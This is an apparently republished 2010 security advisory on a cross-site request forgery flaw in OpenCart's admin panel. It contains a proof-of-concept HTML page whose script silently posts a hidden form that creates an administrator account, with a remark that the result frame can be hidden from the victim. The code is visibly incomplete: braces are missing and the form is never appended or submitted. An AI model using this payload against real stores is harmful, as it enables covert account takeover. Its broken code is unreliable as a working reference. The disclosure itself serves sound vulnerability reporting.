OpenCart CSRF Vulnerability

Subject: OpenCart CSRF Vulnerability

Advisory Information:

Title: OpenCart CSRF Vulnerability
Advisory URL:
Date published: 2010-01-28
Vendors contacted: OpenCart
Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <title>OpenCart CSRF Vulnerability</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <script type="text/javascript">
           function csrfInjection()
                     var params = {
                                                        'username'            : 'an_attacker',
                                                    'firstname'           : 'attack',
                                                 'lastname'            : 'user',
                                                   'email'                       : '',
                                                      'user_group_id'       : '1', //Default group id for administrator level is 1
                                                      'password'            : 'test',
                                                   'confirm'             : 'test',
                                                   'status'              : '1'
                      var form = document.createElement("form");
                  form.setAttribute("method", "post");
                      form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

                 for(var key in params) {
                              var hiddenField = document.createElement("input");
                          hiddenField.setAttribute("type", "hidden");
                               hiddenField.setAttribute("name", key);
                              hiddenField.setAttribute("value", params[key]);


    OpenCart CSRF Vulnerability

       <input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />
      <a href="#" onclick="csrfInjection();return false;">Add User</a>

    <p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>
       <iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>

Copyright © 1995-2020 All rights reserved.